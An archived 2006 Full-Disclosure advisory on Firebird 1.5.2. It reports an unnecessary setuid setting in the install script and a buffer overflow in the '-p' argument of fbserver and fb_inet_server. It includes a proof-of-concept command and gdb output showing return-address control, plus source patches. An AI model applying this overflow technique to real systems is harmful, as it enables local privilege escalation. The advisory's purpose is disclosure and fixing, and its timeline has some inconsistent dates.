lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <1142178967.8696.3.camel@localhost.localdomain>
Date: Sun Mar 12 21:34:00 2006
From: joxeankoret at yahoo.es (Joxean Koret)
Subject: Buffer Overflow and Installation Script Error in
	Firebird 1.5.3

Hi to all!

	In the latest Firebird release (1.5.3) various security problems has
been fixed. Attached goes an advisory about 2 of these.

---
Joxean Koret


-------------- next part --------------
---------------------------------------------------------------------------
     Buffer Overflow and Installation Script Error in Firebird 1.5.3
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005-02-18
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Product: Firebird 
Vulnerable Version: 1.5.2.4731

Description:

Firebird is a relational database offering many ANSI SQL-99 features that runs
on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent 
concurrency, high performance, and powerful language support for stored 
procedures and triggers. It has been used in production systems, under a variety 
of names since 1981.

Web : http://firebird.sourceforge.net

---------------------------------------------------------------------------

Vulnerability List:
~~~~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily
B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:
~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily

 - The installation script of Firebird 1.5.2 makes the binaries fb_inet_server 
and fbserver suid firebird but this is unnecesary. If you takes a look to the 
install script "firebird1.5.2.XXXX/scripts/postinstall.sh" you will see the 
following lines:

    (...)
    # SUID is still needed for group direct access.  General users
    # cannot run though.
    for i in fb_lock_mgr gds_drop fb_inet_server
    do
        if [ -f $i ]
          then
            chmod ug=rx,o= $i
            chmod ug+s $i
        fi
    done
    (...)

but, as the author says the fb_inet_server (at least) doesn't need to be suid firebird.
The following is a fragment of Alex Peshkov (a Firebird developer) response about 
this problem: 

	They need not and should not be set*id. And in standard precompiled 
	binaries fbserver is not setuid. But for unknown to me reasons 
	fb_inet_server is made setuid 'firebird' by install script (Debian guys 
	fixed it, I think). I've noticed it, unfortunately, after release of 
	1.5.2, but definitely will fix it in future releases. Except security 
	vulnerability this brings additional problem when one wants to change 
	fb_inet_server run-user - changing only xinetd.d entry is not enough.

 - Debian distributions are not vulnerable to this problem. As the Alex Peshkov says
Debian people has been fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

 - The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable 
to buffer overflows. If an string of more than 150 characters is passed to the
'-p' parameter of any of these binaries the program will crash with a 
"Segmentation Fault" message.

 - The following is a test of the vulnerability:
 
	/usr/lib/firebird2/bin$ ls
	fb_lock_print  fbguard  fbmgr  fbmgr.bin  fbserver  gsec
	/usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234
	Segmentation fault
	
	The program dies abruptly. The bytes passeds from position 155 to 159
	overwrites the return address:
	
	/usr/lib/firebird2/bin$ gdb ./fbserver
	GNU gdb 6.3
	(...)
	(gdb) run -p `perl -e 'print "a"x155;'`4321
	Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print
	"a"x155;'`4321
	(...)	
	Program received signal SIGSEGV, Segmentation fault.
	[Switching to Thread -1210892160 (LWP 25358)]
	0x31323334 in ?? ()

We have been overwrite the return address with the bytes 0x31 0x32 0x33 0x34, 
the numbers 4 3 2 1 in reverse order.

	(gdb) where
	#0  0x31323334 in ?? ()
	#1  0x08233496 in ?? ()
	#2  0x00000000 in ?? ()
	#3  0xbffff9b0 in ?? ()
	#4  0x00006161 in ?? ()
	#5  0x00000000 in ?? ()
	#6  0x00000000 in ?? ()
	#7  0x00000000 in ?? ()
	#8  0x00000000 in ?? ()
	#9  0x00000000 in ?? ()
	#10 0xbffff9b0 in ?? ()
	#11 0x00000000 in ?? ()
	#12 0x00000000 in ?? ()
	#13 0x00000000 in ?? ()
	#14 0xbffffb04 in ?? ()
	#15 0x0804e370 in ?? ()
	#16 0x00000000 in ?? ()
	#17 0xbffffd50 in ?? ()
	#18 0x00000000 in ?? ()
	#19 0x00000000 in ?? ()
	#20 0x00000000 in ?? ()
	#21 0x00000000 in ?? ()
	#22 0x00000000 in ?? ()

Notes:
~~~~~~

 - Various other problems, not discovered by me, has been fixed in the 1.5.3
version. I encourage to upgrade to the newest version as soon as possible.

Patches for the 1.5.2 version:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 - The following are patches to solve ONLY the problems that I have been found.

Patch for installation script:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------
--- scripts/postinstall.sh      2005-03-25 14:24:40.091819144 +0100
+++ scripts/postinstall.sh.corrected    2005-03-25 14:08:47.777592912 +0100
@@ -401,7 +401,7 @@

     # SUID is still needed for group direct access.  General users
     # cannot run though.
-    for i in fb_lock_mgr gds_drop fb_inet_server
+    for i in fb_lock_mgr gds_drop
     do
         if [ -f $i ]
           then
@@ -508,7 +508,7 @@

     # SUID is still needed for group direct access.  General users
     # cannot run though.
-    for i in fb_lock_mgr gds_drop fb_inet_server
+    for i in fb_lock_mgr gds_drop
     do
       if [ -f $i ]
         then
---------------------END OF THE PATCH------------------------------


Patch for fb_inet_server and/or fbserver buffer overflow:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------
--- src/remote/inet_server.cpp  2004-09-29 12:03:39.000000000 +0200
+++ src/remote/inet_server.cpp.corrected        2005-03-25 14:17:59.698688152 +0100
@@ -32,7 +32,7 @@
  *
  */
 /*
-$Id: inet_server.cpp,v 1.26.2.2 2004/09/29 10:03:39 paul_reeves Exp $
+$Id: inet_server.cpp,v 1.26.2.3 2005/03/23 12:59:25 alexpeshkoff Exp $
 */
 #include "firebird.h"
 #include "../jrd/ib_stdio.h"
@@ -277,7 +277,10 @@
                                        break;

                                case 'P':
-                                       sprintf(protocol, "/%s", *argv++);
+                                       protocol[0] = '/';
+                                       protocol[1] = 0;
+                                       strncat(protocol, *argv++,
+                                               sizeof(protocol) - strlen(protocol) - 1);
                                        break;

                 case 'H':
@@ -407,12 +410,9 @@

 /* before starting the superserver stuff change directory to tmp */
        if (CHANGE_DIR(TEMP_DIR)) {
-               char err_buf[1024];
-
                /* error on changing the directory */
-               sprintf(err_buf, "Could not change directory to %s due to errno %d",
+               gds__log("Could not change directory to %s due to errno %d",
                                TEMP_DIR, errno);
-               gds__log(err_buf);
        }

 /* Server tries to attash to security.fdb to make sure everything is OK
---------------------END OF THE PATCH------------------------------

The fix:
~~~~~~~~

The problems are fixed, in the current 1.5.3 version of the Firebird binary 
distribution.

Thanks
~~~~~~

Thanks to Alex Peshkov, he where very kind and professional.

Timeline:
~~~~~~~~~
			
2005-02-18: Initial contact.
2005-02-11: Contact with Alex Peshkov.
2005-03-25: BOF (and various others) fixed in CVS.
2005-03-25: Wait for ~2 months after the 1.5.3 release.
2006-01-25: Firebird 1.5.3 released.
2006-03-12: Public disclosure.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
	digitalmente
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060312/a5fdb4aa/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ